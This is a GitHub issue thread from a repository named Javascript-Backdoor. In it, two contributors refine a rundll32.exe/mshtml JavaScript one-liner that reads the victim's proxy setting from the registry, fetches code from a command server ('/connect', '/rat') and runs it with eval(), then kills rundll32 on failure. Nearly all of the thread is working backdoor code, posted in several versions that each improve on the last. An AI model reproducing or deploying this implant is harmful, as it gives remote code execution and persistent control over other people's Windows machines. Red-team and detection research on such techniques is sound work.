search

3gstudent / Javascript-Backdoor

Learn from Casey Smith @subTee
241 stars 110 forks source link

Proxy Settigns #2

Closed ghost closed 8 years ago

ghost commented 8 years ago

You may want to add the following to your script in order to work behind a proxy server.

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");v=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);h.Open("GET","http://127.0.0.1/connect",false);h.Send();B=h.ResponseText;eval(B)

This addition will add a registry read to get the proxy setting and incorporate that into subsequent requests.

Like this; try { w = new ActiveXObject("WScript.Shell"); v = w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer"); q = v.split("=")[1].split(";")[0]; h = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); h.SetProxy(2,q); h.Open("GET","http://'+$Server+'/rat",false); h.Send(); Cheers,

Casey @subTee

L34Rn commented 8 years ago

nice!

3gstudent commented 8 years ago

@subTee many thanks My test.js: w = new ActiveXObject("WScript.Shell"); v = w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer"); //q = v.split("=")[1].split(";")[0]; var myMsgBox=new ActiveXObject("wscript.shell"); myMsgBox.Popup (v);

1

I think the code "q = v.split("=")[1].split(";")[0];" shoule be ignored,I am very confused because if not it will occour the error:

2

Finally,I have to add another "try{}catch{}" to detect if it is behind a proxy server. So I think the full code is rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");h.SetProxy(2,v);}catch(e){}h.Open("GET","http://127.0.0.1/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

3

Thank you for your help:) 3gstudent

ghost commented 8 years ago

The reason for this code. q = v.split("=")[1].split(";")[0]; Is that the proxy setting can contain multiple entires.
For example... http=127.0.0.1:8888;https=127.0.0.1:8888 So, you will need to handle that. Also, you will need to patch each request to use that proxy setting for all call backs, not just the initial connect. Install the free tool Fiddler as an easy way to test a proxy. http://www.telerik.com/fiddler Cheers

Casey

3gstudent commented 8 years ago

@subTee

You are right The registry key can contain multiple ip addresses,So I need to pares it properly The reason of my error is my proxy setting doesn't contain the letters "http=" Here is the new code: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet%20Settings\\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}